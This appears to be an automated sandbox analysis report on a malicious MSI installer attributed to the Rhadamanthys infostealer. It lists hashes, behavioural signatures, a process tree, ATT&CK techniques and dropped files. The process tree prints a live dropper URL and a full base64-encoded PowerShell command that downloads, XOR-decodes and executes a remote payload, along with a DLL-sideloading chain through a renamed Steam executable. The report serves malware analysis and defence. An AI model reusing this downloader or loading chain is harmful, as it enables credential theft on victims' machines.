Analysis

  • max time kernel
    92s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-06-2024 15:11

General

  • Target

    __x64___setup___x32__/setup.msi

  • Size

    24.5MB

  • MD5

    0bd85ea206276e8e5d6ea143c5cb8330

  • SHA1

    75079d986324ff1d4150bf00fd10ea73f43d0a76

  • SHA256

    8bd23057abb6865b761ae9719ea6a66ce97d70225abab2d7b2ddce84e35ca602

  • SHA512

    6ac02552c727394ed9036d5015f8a6652619f9fab7ac8e06ccf5bb301580143e4c24477722cfa8ac7e5082b298e3d8ee72b04a14fbe9ee454a120ba58baf0192

  • SSDEEP

    786432:zDMcQi4FgSUZGaQ5MHnPa4lJQJU8P8uBsTaxsn:zDMQ4KMaQqvu04On

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://opensun.monster/25053.bs64

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 14 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2824
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4688
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32__\setup.msi
      1⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1840
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4008
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 80F9A3683E46A6C0E6DE698D23B7EA1C
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:636
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss376E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi376B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr376C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr376D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4368
      • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\UnRAR.exe
        "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\UnRAR.exe" x -p79d20ea766e8 "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\"
        2⤵
        • Executes dropped EXE
        PID:1760
      • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\steamerrorreporter64.exe
        "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\steamerrorreporter64.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3048
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe explorer.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of UnmapMainImage
          • Suspicious use of WriteProcessMemory
          PID:2300
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1152
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 1896
            4⤵
            • Program crash
            PID:712
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 1904
            4⤵
            • Program crash
            PID:4332
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 1912
            4⤵
            • Program crash
            PID:3632
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2300 -ip 2300
      1⤵
        PID:4012
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2300 -ip 2300
        1⤵
          PID:3496
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2300 -ip 2300
          1⤵
            PID:4820

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Execution

          Command and Scripting Interpreter

          1
          T1059

          PowerShell

          1
          T1059.001

          Discovery

          Query Registry

          1
          T1012

          Peripheral Device Discovery

          1
          T1120

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Config.Msi\e5733d4.rbs
            Filesize

            21KB

            MD5

            8a22678f8cafedf334cccc9d8fa6a76e

            SHA1

            6d3d9e04a5ea48ffddc59caf9f95679b01b1df2d

            SHA256

            0812839f3016767388296580496c8848831d81a3216c2afa37c7a298dec234e8

            SHA512

            7c6811e26d7ed71b83418e44071e8b22189d2e57094859563919ea08e62a38136a942e12cd39ed39a281b0603307984a11a54de6126ecec69ef433daae9e1de3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            18KB

            MD5

            9043faecb07dc1f26e74b1308314249c

            SHA1

            389ad65316b17a884c5a738210f0c3671b3ce65f

            SHA256

            e6d4b957ec997c3d9655bc01ecd2b33f731ec622249d209ec6749afd56c35c1d

            SHA512

            cd87a7b085f6dbcf434f41ad11ddaf5e1b52f3b56b95bb0f75ca8f76d6a510329a37811940c397483ab27282b11c52c09a796a82a126ef3cab989ff7e6c03e2f

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvdvlnye.jef.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\msi376B.txt
            Filesize

            136B

            MD5

            61272a4ab9bf0a6ea76e28f2513726fa

            SHA1

            6027604a6bb09956c4b2d48a2d35470bfe86e39d

            SHA256

            1f432cbf91eda4097555450de475e90ea135477655bd33ef12609be369ba4754

            SHA512

            e309cd5c70df6303ac2c9528e487e01333504232fe8fc2d7bb0df1c5528fc2a5f5a6ce71bbd1ccffd727055dfb27019116f06b51945d34d72e2060563a480c17

          • C:\Users\Admin\AppData\Local\Temp\pss376E.ps1
            Filesize

            6KB

            MD5

            30c30ef2cb47e35101d13402b5661179

            SHA1

            25696b2aab86a9233f19017539e2dd83b2f75d4e

            SHA256

            53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f

            SHA512

            882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

          • C:\Users\Admin\AppData\Local\Temp\scr376C.ps1
            Filesize

            682B

            MD5

            b32210f90a3fbfd1ef15caee45ebc871

            SHA1

            91deac74edcf1e6b4c3a81fa322ac76867075c62

            SHA256

            c2aaabc2c09034d97d1ee67d912f25fe5f966539ea19624f062ece0a5aad606b

            SHA512

            7b86aaa400b9f3b73720e99d1ae2f7ef3c4f23a7076b33545cdce6b34a003323fa05203193b1127f0bf25d718fe8d4f81ab282df04ba433dc1219e3f9ba4698b

          • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\UnRAR.exe
            Filesize

            494KB

            MD5

            98ccd44353f7bc5bad1bc6ba9ae0cd68

            SHA1

            76a4e5bf8d298800c886d29f85ee629e7726052d

            SHA256

            e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b

            SHA512

            d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

          • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\ruw9eigh.rar
            Filesize

            382KB

            MD5

            128b722e0ebb178c36611aebe02999bf

            SHA1

            c5ac682b02a65f0bc8db41d18e0ec446ee8df2fd

            SHA256

            ea63d053a4c92c389105ede63d11baca8158a62ec4fb684d12ea3087118e405e

            SHA512

            e5e3877a7fda5f4b9129e036d63afd31ac1cad8daa2fb5226fb5df472432aa9dab2f2c4547450354f0e34a7d6f6e09ccbc4d7733b29f31b67c75b1a7c73e40af

          • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\steamerrorreporter64.exe
            Filesize

            639KB

            MD5

            fd3ce044ac234fdab3df9d7f492c470a

            SHA1

            a74a287d5d82a8071ab36c72b2786342d83a8ef7

            SHA256

            0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba

            SHA512

            86d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d

          • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\tier0_s64.dll
            Filesize

            386KB

            MD5

            7e60404cfb232a1d3708a9892d020e84

            SHA1

            31328d887bee17641608252fb2f9cd6caf8ba522

            SHA256

            5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766

            SHA512

            4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c

          • C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\vstdlib_s64.dll
            Filesize

            1023KB

            MD5

            1e03adffd3912b6e3e8a4969fa7eeb26

            SHA1

            012f2578ff5800c3fc7972843bb99a851a2f03d0

            SHA256

            edcff29d4eed320bcd710db9426be3b39223752fa8de4dafcfd3c5fbda24ea5f

            SHA512

            96ccb3e1095b99918ea6279405538882f3658293452292fc4a3272c6cee284fa0cc52ec4325690cc27046ca8faf4c98a94e31066a25aff526eb93d5a7baf71be

          • C:\Windows\Installer\MSI344E.tmp
            Filesize

            738KB

            MD5

            b158d8d605571ea47a238df5ab43dfaa

            SHA1

            bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

            SHA256

            ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

            SHA512

            56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

          • C:\Windows\Installer\MSI3647.tmp
            Filesize

            758KB

            MD5

            fb4665320c9da54598321c59cc5ed623

            SHA1

            89e87b3cc569edd26b5805244cfacb2f9c892bc7

            SHA256

            9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59

            SHA512

            b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

          • C:\Windows\Installer\e5733d1.msi
            Filesize

            24.5MB

            MD5

            0bd85ea206276e8e5d6ea143c5cb8330

            SHA1

            75079d986324ff1d4150bf00fd10ea73f43d0a76

            SHA256

            8bd23057abb6865b761ae9719ea6a66ce97d70225abab2d7b2ddce84e35ca602

            SHA512

            6ac02552c727394ed9036d5015f8a6652619f9fab7ac8e06ccf5bb301580143e4c24477722cfa8ac7e5082b298e3d8ee72b04a14fbe9ee454a120ba58baf0192

          • memory/1152-226-0x000002DF7E4C0000-0x000002DF7E682000-memory.dmp
            Filesize

            1.8MB

          • memory/1152-176-0x000002DF7BA60000-0x000002DF7BA82000-memory.dmp
            Filesize

            136KB

          • memory/1152-228-0x000002DF7EBC0000-0x000002DF7F0E8000-memory.dmp
            Filesize

            5.2MB

          • memory/1152-200-0x000002DF7BD00000-0x000002DF7BD1C000-memory.dmp
            Filesize

            112KB

          • memory/2300-229-0x00007FFE4D930000-0x00007FFE4DB25000-memory.dmp
            Filesize

            2.0MB

          • memory/2300-174-0x0000000000290000-0x00000000002B8000-memory.dmp
            Filesize

            160KB

          • memory/2300-243-0x00000000002C0000-0x0000000000389000-memory.dmp
            Filesize

            804KB

          • memory/2300-231-0x00000000758B0000-0x0000000075AC5000-memory.dmp
            Filesize

            2.1MB

          • memory/2300-227-0x0000000004440000-0x0000000004840000-memory.dmp
            Filesize

            4.0MB

          • memory/2300-225-0x0000000004440000-0x0000000004840000-memory.dmp
            Filesize

            4.0MB

          • memory/2300-173-0x0000000000290000-0x00000000002B8000-memory.dmp
            Filesize

            160KB

          • memory/2300-172-0x0000000000290000-0x00000000002B8000-memory.dmp
            Filesize

            160KB

          • memory/3048-170-0x000001E4D3C30000-0x000001E4D3C31000-memory.dmp
            Filesize

            4KB

          • memory/3048-171-0x000001E4D3C40000-0x000001E4D3C65000-memory.dmp
            Filesize

            148KB

          • memory/4368-48-0x00000000071D0000-0x0000000007266000-memory.dmp
            Filesize

            600KB

          • memory/4368-31-0x00000000058B0000-0x0000000005916000-memory.dmp
            Filesize

            408KB

          • memory/4368-43-0x0000000005F80000-0x0000000005F9E000-memory.dmp
            Filesize

            120KB

          • memory/4368-44-0x0000000005FB0000-0x0000000005FFC000-memory.dmp
            Filesize

            304KB

          • memory/4368-29-0x00000000050D0000-0x00000000056F8000-memory.dmp
            Filesize

            6.2MB

          • memory/4368-53-0x0000000008C30000-0x000000000915C000-memory.dmp
            Filesize

            5.2MB

          • memory/4368-32-0x0000000005920000-0x0000000005986000-memory.dmp
            Filesize

            408KB

          • memory/4368-30-0x0000000004FF0000-0x0000000005012000-memory.dmp
            Filesize

            136KB

          • memory/4368-46-0x0000000007900000-0x0000000007F7A000-memory.dmp
            Filesize

            6.5MB

          • memory/4368-42-0x0000000005990000-0x0000000005CE4000-memory.dmp
            Filesize

            3.3MB

          • memory/4368-47-0x00000000064F0000-0x000000000650A000-memory.dmp
            Filesize

            104KB

          • memory/4368-49-0x0000000007130000-0x0000000007152000-memory.dmp
            Filesize

            136KB

          • memory/4368-50-0x0000000007F80000-0x0000000008524000-memory.dmp
            Filesize

            5.6MB

          • memory/4368-28-0x00000000029F0000-0x0000000002A26000-memory.dmp
            Filesize

            216KB

          • memory/4368-52-0x0000000008530000-0x00000000086F2000-memory.dmp
            Filesize

            1.8MB

          • memory/4688-234-0x00000000024B0000-0x00000000028B0000-memory.dmp
            Filesize

            4.0MB

          • memory/4688-237-0x00000000758B0000-0x0000000075AC5000-memory.dmp
            Filesize

            2.1MB

          • memory/4688-235-0x00007FFE4D930000-0x00007FFE4DB25000-memory.dmp
            Filesize

            2.0MB

          • memory/4688-232-0x00000000005E0000-0x00000000005E9000-memory.dmp
            Filesize

            36KB